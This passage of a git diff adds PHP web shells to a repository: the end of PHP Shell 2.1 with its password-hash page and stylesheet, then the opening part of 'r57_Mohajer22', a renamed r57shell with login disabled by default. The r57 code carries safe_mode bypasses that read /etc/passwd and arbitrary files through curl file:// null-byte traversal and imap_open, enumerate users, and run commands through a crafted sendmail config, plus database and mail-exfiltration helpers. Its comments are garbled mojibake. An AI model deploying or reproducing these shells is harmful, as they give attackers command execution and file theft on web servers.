(is_array($value)) + return array_map('stripslashes_deep', $value); + else + return stripslashes($value); +} + +if (get_magic_quotes_gpc()) + $_POST = stripslashes_deep($_POST); + +/* Initialize some variables we need again and again. */ +$username = isset($_POST['username']) ? $_POST['username'] : ''; +$password = isset($_POST['password']) ? $_POST['password'] : ''; +$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; + +$command = isset($_POST['command']) ? $_POST['command'] : ''; +$rows = isset($_POST['rows']) ? $_POST['rows'] : 24; +$columns = isset($_POST['columns']) ? $_POST['columns'] : 80; + + +/* Load the configuration. */ +$ini = parse_ini_file('config.php', true); + +if (empty($ini['settings'])) + $ini['settings'] = array(); + +/* Default settings --- these settings should always be set to something. */ +$default_settings = array('home-directory' => '.'); + +/* Merge settings. */ +$ini['settings'] = array_merge($default_settings, $ini['settings']); + + +session_start(); + +/* Delete the session data if the user requested a logout. This leaves the + * session cookie at the user, but this is not important since we + * authenticates on $_SESSION['authenticated']. */ +if (isset($_POST['logout'])) + logout(); + +/* Attempt authentication. */ +if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && + isset($ini['users'][$username])) { + if (strchr($ini['users'][$username], ':') === false) { + // No seperator found, assume this is a password in clear text. + $_SESSION['authenticated'] = ($ini['users'][$username] == $password); + } else { + list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); + $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); + } +} + + +/* Enforce default non-authenticated state if the above code didn't set it + * already. */ +if (!isset($_SESSION['authenticated'])) + $_SESSION['authenticated'] = false; + + +if ($_SESSION['authenticated']) { + /* Initialize the session variables. */ + if (empty($_SESSION['cwd'])) { + $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); + $_SESSION['history'] = array(); + $_SESSION['output'] = ''; + } + + if (!empty($command)) { + /* Save the command for late use in the JavaScript. If the command is + * already in the history, then the old entry is removed before the + * new entry is put into the list at the front. */ + if (($i = array_search($command, $_SESSION['history'])) !== false) + unset($_SESSION['history'][$i]); + + array_unshift($_SESSION['history'], $command); + + /* Now append the commmand to the output. */ + $_SESSION['output'] .= '$ ' . $command . "\n"; + + /* Initialize the current working directory. */ + if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) { + $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); + } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { + /* The current command is a 'cd' command which we have to handle + * as an internal shell command. */ + + if ($regs[1]{0} == '/') { + /* Absolute path, we use it unchanged. */ + $new_dir = $regs[1]; + } else { + /* Relative path, we append it to the current working + * directory. */ + $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; + } + + /* Transform '/./' into '/' */ + while (strpos($new_dir, '/./') !== false) + $new_dir = str_replace('/./', '/', $new_dir); + + /* Transform '//' into '/' */ + while (strpos($new_dir, '//') !== false) + $new_dir = str_replace('//', '/', $new_dir); + + /* Transform 'x/..' into '' */ + while (preg_match('|/\.\.(?!\.)|', $new_dir)) + $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); + + if ($new_dir == '') $new_dir = '/'; + + /* Try to change directory. */ + if (@chdir($new_dir)) { + $_SESSION['cwd'] = $new_dir; + } else { + $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; + } + + } elseif (trim($command) == 'exit') { + logout(); + } else { + + /* The command is not an internal command, so we execute it after + * changing the directory and save the output. */ + chdir($_SESSION['cwd']); + + // We canot use putenv() in safe mode. + if (!ini_get('safe_mode')) { + // Advice programs (ls for example) of the terminal size. + putenv('ROWS=' . $rows); + putenv('COLUMNS=' . $columns); + } + + /* Alias expansion. */ + $length = strcspn($command, " \t"); + $token = substr($command, 0, $length); + if (isset($ini['aliases'][$token])) + $command = $ini['aliases'][$token] . substr($command, $length); + + $io = array(); + $p = proc_open($command, + array(1 => array('pipe', 'w'), + 2 => array('pipe', 'w')), + $io); + + /* Read output sent to stdout. */ + while (!feof($io[1])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), + ENT_COMPAT, 'UTF-8'); + } + /* Read output sent to stderr. */ + while (!feof($io[2])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), + ENT_COMPAT, 'UTF-8'); + } + + fclose($io[1]); + fclose($io[2]); + proc_close($p); + } + } + + /* Build the command history for use in the JavaScript */ + if (empty($_SESSION['history'])) { + $js_command_hist = '""'; + } else { + $escaped = array_map('addslashes', $_SESSION['history']); + $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; + } +} + +?> +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" + "http://www.w3.org/TR/html4/strict.dtd"> +<html> +<head> + <title>PHP Shell 2.1</title> + <link rel="stylesheet" href="style.css" type="text/css"> + + <script type="text/javascript"> + <?php if ($_SESSION['authenticated']) { ?> + + var current_line = 0; + var command_hist = new Array(<?php echo $js_command_hist ?>); + var last = 0; + + function key(e) { + if (!e) var e = window.event; + + if (e.keyCode == 38 && current_line < command_hist.length-1) { + command_hist[current_line] = document.shell.command.value; + current_line++; + document.shell.command.value = command_hist[current_line]; + } + + if (e.keyCode == 40 && current_line > 0) { + command_hist[current_line] = document.shell.command.value; + current_line--; + document.shell.command.value = command_hist[current_line]; + } + + } + + function init() { + document.shell.setAttribute("autocomplete", "off"); + document.shell.output.scrollTop = document.shell.output.scrollHeight; + document.shell.command.focus(); + } + + <?php } else { ?> + + function init() { + document.shell.username.focus(); + } + + <?php } ?> + </script> +</head> + +<body onload="init()"> + +<h1>PHP Shell 2.1</h1> + +<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post"> + +<?php +if (!$_SESSION['authenticated']) { + /* Genereate a new nounce every time we preent the login page. This binds + * each login to a unique hit on the server and prevents the simple replay + * attack where one uses the back button in the browser to replay the POST + * data from a login. */ + $_SESSION['nounce'] = mt_rand(); + +?> + +<fieldset> + <legend>Authentication</legend> + + <?php + if (!empty($username)) + echo ' <p class="error">Login failed, please try again:</p>' . "\n"; + else + echo " <p>Please login:</p>\n"; + ?> + + <p>Username: <input name="username" type="text" value="<?php echo $username + ?>"></p> + + <p>Password: <input name="password" type="password"></p> + + <p><input type="submit" value="Login"></p> + + <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>"> + +</fieldset> + +<?php } else { /* Authenticated. */ ?> + +<fieldset> + <legend>Current Working Directory: <code><?php + echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8'); + ?></code></legend> + + +<div id="terminal"> +<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>"> +<?php +$lines = substr_count($_SESSION['output'], "\n"); +$padding = str_repeat("\n", max(0, $rows+1 - $lines)); +echo rtrim($padding . $_SESSION['output']); +?> +</textarea> +<p id="prompt"> + $&nbsp;<input name="command" type="text" + onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1"> +</p> +</div> + +<p> + <span style="float: right">Size: <input type="text" name="rows" size="2" + maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text" + name="columns" size="2" maxlength="3" value="<?php echo $columns + ?>"></span> + +<input type="submit" value="Execute Command"> + <input type="submit" name="logout" value="Logout"> +</p> + +</fieldset> + +<?php } ?> + +</form> + + +<hr> + +<p>Please consult the <a href="README">README</a>, <a +href="INSTALL">INSTALL</a>, and <a href="SECURITY">SECURITY</a> files for +instruction on how to use PHP Shell.</p> + +<hr> + +<address> +Copyright &copy; 2000&ndash;2005, <a +href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the +latest version at <a +href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>. +</address> + +</body> +</html> diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/pwhash.php b/php/PHPshell/م€گphpshell-2.1م€‘/pwhash.php new file mode 100644 index 0000000..e45ee15 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/pwhash.php @@ -0,0 +1,100 @@ +<?php +/* + * pwhash.php file for PHP Shell 2.1 + * Copyright (C) 2005 Martin Geisler <mgeisler@mgeisler.net> + * Licensed under the GNU GPL. See the file COPYING for details. + */ + +function stripslashes_deep($value) { + if (is_array($value)) + return array_map('stripslashes_deep', $value); + else + return stripslashes($value); +} + +if (get_magic_quotes_gpc()) + $_POST = stripslashes_deep($_POST); + +$username = isset($_POST['username']) ? $_POST['username'] : ''; +$password = isset($_POST['password']) ? $_POST['password'] : ''; + +?> +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" + "http://www.w3.org/TR/html4/strict.dtd"> +<html> +<head> + <title>Password Hasher for PHP Shell 2.1</title> + <link rel="stylesheet" href="style.css" type="text/css"> +</head> + +<body> + +<h1>Password Hasher for PHP Shell 2.1</h1> + +<form action="<?php $_SERVER['PHP_SELF']; ?>" method="POST"> + +<fieldset> + <legend>Username</legend> + <input name="username" type="text" value="<?php echo $username ?>"> +</fieldset> + +<fieldset> + <legend>Password</legend> + <input name="password" type="text" value="<?php echo $password ?>"> +</fieldset> + +<fieldset> + <legend>Result</legend> + +<?php +if ($username == '' || $password == '') { + echo " <p><i>Enter a username and a password and update.</i></p>\n"; +} else { + + $u = strtolower($username); + + if (preg_match('/[[ |&~!()]/', $u) || $u == 'null' || + $u == 'yes' || $u == 'no' || $u == 'true' || $u == 'false') { + + echo ' <p class="error">Your username cannot contain any of the following reserved + word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>", or + "<tt>false</tt>". The following characters are also prohibited: + "<tt>&nbsp;</tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pipe), + "<tt>&</tt>" (ampersand), "<tt>~</tt>" (tilde), "<tt>!</tt>" (exclamation + mark), "<tt>(</tt>" (left parenthesis), or "<tt>)</tt>" (right + parenthesis).</p>' . "\n"; + + echo ' <p>Please choose another username and try again.</p>' . "\n"; + + } else { + echo " <p>Write the following line into <tt>config.php</tt> " . + "in the <tt>users</tt> section:</p>\n"; + + $fkt = 'md5'; // Change to sha1 is you feel like it... + $salt = dechex(mt_rand()); + + $hash = $fkt . ':' . $salt . ':' . $fkt($salt . $password); + + echo "<pre>\n"; + echo htmlentities(str_pad($username, 8) . ' = "' . $hash . '"') . "\n"; + echo "</pre>\n"; + } +} +?> + +<p><input type="submit" value="Update"></p> + +</fieldset> + +</form> + + +<hr> + +<address> +Copyright &copy; 2005, <a href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the +latest version at <a href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>. +</address> + +</body> +</html> diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/style.css b/php/PHPshell/م€گphpshell-2.1م€‘/style.css new file mode 100644 index 0000000..49ccbe5 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/style.css @@ -0,0 +1,58 @@ +/* style.css file for PHP Shell 2.1 + * Copyright (C) 2003-2005 Martin Geisler <mgeisler@mgeisler.net> + * Licensed under the GNU GPL. See the file COPYING for details. + */ + +body { + font-family: sans-serif; + color: black; + background: white; +} + +h1 { + color: red; + background: white; +} + +img { + border: none; +} + +div#terminal { + border: inset 2px red; + padding: 2px; + margin-top: 0.5em; +} + +div#terminal textarea { + font-size: 100%; + width: 100%; + border: none; +} + +p { + margin-top: 0.5em; + margin-bottom: 0.5em; +} + +p#prompt { + font-family: monospace; + margin: 0px; +} + +p#prompt input { + border: none; + font-family: monospace; +} + +legend { + padding-right: 0.5em; +} + +fieldset { + padding: 0.5em; +} + +.error { + color: red; +} \ No newline at end of file diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/ه¤‡و³¨.txt b/php/PHPshell/م€گphpshell-2.1م€‘/ه¤‡و³¨.txt new file mode 100644 index 0000000..1e5ff05 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/ه¤‡و³¨.txt @@ -0,0 +1 @@ +ذ轫ثùسذخؤ¼‏ةد´«ضء·‏خٌئ÷²إ؟ةت¹سأ diff --git a/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.jpg b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.jpg new file mode 100644 index 0000000..26e996d Binary files /dev/null and b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.jpg differ diff --git a/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.php b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.php new file mode 100644 index 0000000..0fc3204 --- /dev/null +++ b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.php @@ -0,0 +1,2369 @@ +<?php + + +/******************************************************************************************************/ +/* +/* # # # # +/* # # # # +/* # # # # +/* # ## #### ## # +/* ## ## ###### ## ## +/* ## ## ###### ## ## +/* ## ## #### ## ## +/* ### ############ ### +/* ######################## +/* ############## +/* ######## ########## ####### +/* ### ## ########## ## ### +/* ### ## ########## ## ### +/* ### # ########## # ### +/* ### ## ######## ## ### +/* ## # ###### # ## +/* ## # #### # ## +/* ## ## +/* +/* +/* +/* r57shell.php - أ±أھأ°أ¨أ¯أ² أ­أ  أ¯أµأ¯ أ¯أ®أ§أ¢أ®أ«أ؟أ¾أ¹أ¨أ© أ¢أ أ¬ أ¢أ»أ¯أ®أ«أ­أ؟أ²أ¼ أ±أ¨أ±أ²أ¥أ¬أ­أ»أ¥ أھأ®أ¬أ أ­أ¤أ» أ­أ  أ±أ¥أ°أ¢أ¥أ°أ¥ أ·أ¥أ°أ¥أ§ أ،أ°أ أ³أ§أ¥أ° +/* أ‚أ» أ¬أ®أ¦أ¥أ²أ¥ أ±أھأ أ·أ أ²أ¼ أ­أ®أ¢أ³أ¾ أ¢أ¥أ°أ±أ¨أ¾ أ­أ  أ­أ أ¸أ¥أ¬ أ±أ أ©أ²أ¥: http://rst.void.ru +/* أ‚أ¥أ°أ±أ¨أ؟: 1.3 (05.03.2006) +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* أژأ²أ¤أ¥أ«أ¼أ­أ أ؟ أ،أ«أ أ£أ®أ¤أ أ°أ­أ®أ±أ²أ¼ أ§أ  أ¯أ®أ¬أ®أ¹أ¼ أ¨ أ¨أ¤أ¥أ¨: blf, phoenix, virus, NorD أ¨ أ¢أ±أ¥أ¬ أ·أ¥أ°أ²أ؟أ¬ أ¨أ§ RST/GHC. +/* أ…أ±أ«أ¨ أ³ أ‚أ أ± أ¥أ±أ²أ¼ أھأ أھأ¨أ¥-أ«أ¨أ،أ® أ¨أ¤أ¥أ¨ أ¯أ® أ¯أ®أ¢أ®أ¤أ³ أ²أ®أ£أ® أھأ أھأ¨أ¥ أ´أ³أ­أھأ¶أ¨أ¨ أ±أ«أ¥أ¤أ³أ¥أ² أ¤أ®أ،أ أ¢أ¨أ²أ¼ أ¢ أ±أھأ°أ¨أ¯أ² أ²أ® أ¯أ¨أ¸أ¨أ²أ¥ +/* أ­أ  rst@void.ru. أ‚أ±أ¥ أ¯أ°أ¥أ¤أ«أ®أ¦أ¥أ­أ¨أ؟ أ،أ³أ¤أ³أ² أ°أ أ±أ±أ¬أ®أ²أ°أ¥أ­أ». +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +/* ~~~ أچأ أ±أ²أ°أ®أ©أھأ¨ | Options ~~~ */ + +// أ‚أ»أ،أ®أ° أ؟أ§أ»أھأ  | Language +// $language='ru' - أ°أ³أ±أ±أھأ¨أ© (russian) +// $language='eng' - english (أ أ­أ£أ«أ¨أ©أ±أھأ¨أ©) +$language='eng'; + +// أ€أ³أ²أ¥أ­أ²أ¨أ´أ¨أھأ أ¶أ¨أ؟ | Authentification +// $auth = 1; - أ€أ³أ²أ¥أ­أ²أ¨أ´أ¨أھأ أ¶أ¨أ؟ أ¢أھأ«أ¾أ·أ¥أ­أ  ( authentification = On ) +// $auth = 0; - أ€أ³أ²أ¥أ­أ²أ¨أ´أ¨أھأ أ¶أ¨أ؟ أ¢أ»أھأ«أ¾أ·أ¥أ­أ  ( authentification = Off ) +$auth = 0; + +// أ‹أ®أ£أ¨أ­ أ¨ أ¯أ أ°أ®أ«أ¼ أ¤أ«أ؟ أ¤أ®أ±أ²أ³أ¯أ  أھ أ±أھأ°أ¨أ¯أ²أ³ (Login & Password for access) +// أچأ… أ‡أ€أپأ“أ„أœأ’أ… أ‘أŒأ…أچأˆأ’أœ أڈأ…أگأ…أ„ أگأ€أ‡أŒأ…أ™أ…أچأˆأ…أŒ أچأ€ أ‘أ…أگأ‚أ…أگأ…!!! (CHANGE THIS!!!) +// أ‹أ®أ£أ¨أ­ أ¨ أ¯أ أ°أ®أ«أ¼ أ¸أ¨أ´أ°أ³أ¾أ²أ±أ؟ أ± أ¯أ®أ¬أ®أ¹أ¼أ¾ أ أ«أ£أ®أ°أ¨أ²أ¬أ  md5, أ§أ­أ أ·أ¥أ­أ¨أ؟ أ¯أ® أ³أ¬أ®أ«أ·أ أ­أ¨أ¾ 'r57' +// Login & password crypted with md5, default is 'r57' +$name='7fea0708f4bc4266ab5efcd242028106'; // أ«أ®أ£أ¨أ­ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ (user login) +$pass='a66abb5684c45962d887564f08346e8d'; // أ¯أ أ°أ®أ«أ¼ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ (user password) +/******************************************************************************************************/ +if(empty($_POST['Mohajer22'])){ + +} else { +$m=$_POST['Mohajer22']; +$ch = +curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +} + + + +$string = !empty($_POST['string']) ? $_POST['string'] : 0; +$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; + +if ($string && $switch == "file") { +$stream = imap_open($string, "", ""); + +$str = imap_body($stream, 1); +if (!empty($str)) +echo "<pre>".$str."</pre>"; +imap_close($stream); +} elseif ($string && $switch == "dir") { +$stream = imap_open("/etc/passwd", "", ""); +if ($stream == FALSE) +die("Can't open imap stream"); + +$string = explode("|",$string); +if (count($string) > 1) +$dir_list = imap_list($stream, trim($string[0]), trim($string[1])); +else +$dir_list = imap_list($stream, trim($string[0]), "*"); +echo "<pre>"; +for ($i = 0; $i < count($dir_list); $i++) +echo "$dir_list[$i]"."<p>&nbsp;</p>" ; +echo "</pre>"; +imap_close($stream); +} + + +if ($_POST['plugin'] && ($submit == "Show")){ + $param1 = $_POST[param1]; + $param2 = $_POST[param2]; + + switch($_POST['plugin']){ + case("cat /etc/passwd"): + for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "<br>"; + } + } + + break; + + case ("/bin/ls"): + if($param1){$exec = "/bin/ls ". $param1;} + else{$exec = "/bin/ls";} + $fp = popen("$exec", "r"); + print $fp; + pclose($fp); + break; + + case("tempnam"): + $cmd = $param1; + $script=tempnam("/tmp", "script"); + $cf=tempnam("/tmp", "cf"); + $fd = fopen($cf, "w"); + fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . "$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script"); + fclose($fd); + $fd = fopen($script, "w"); + fwrite($fd, "rm -f $script $cf; "); + fwrite($fd, $cmd); + fclose($fd); + break; + + case("/tmp"): + $target_file= $param1; + if (!$param2){$tmp_file="/tmp/tmp.ghc";} + else{$tmp_file = $param2;} + print copy($target_file, $tmp_file); + + $handle = fopen ($tmp_file, "r"); + while (!feof ($handle)) { + $buffer = fgets($handle, 4096); + echo $buffer; + } + fclose ($handle); + break; + + } + } + +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.3"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); + } +} +$head = '<!-- أ‡أ¤أ°أ أ¢أ±أ²أ¢أ³أ© أ‚أ أ±أ؟ --> +<html> +<head> +<title>MOHAJER22</title> +<meta http-equiv="Content-Language" content="en-us"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +BACKGROUND-COLOR: #000000; +COLOR:red; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +BACKGROUND-COLOR:black; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #000000; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #000000 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #000000 1px outset; +BACKGROUND-COLOR: #000000; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #000000; +COLOR: #ffffff; +font: Fixedsys bold; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #993333; +COLOR: #ffffff; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR:black; +COLOR: #ffffff; +width: 40%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #000000; +COLOR: #ffffff; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +BACKGROUND-COLOR:black; +COLOR: #ffffff; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:red;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { 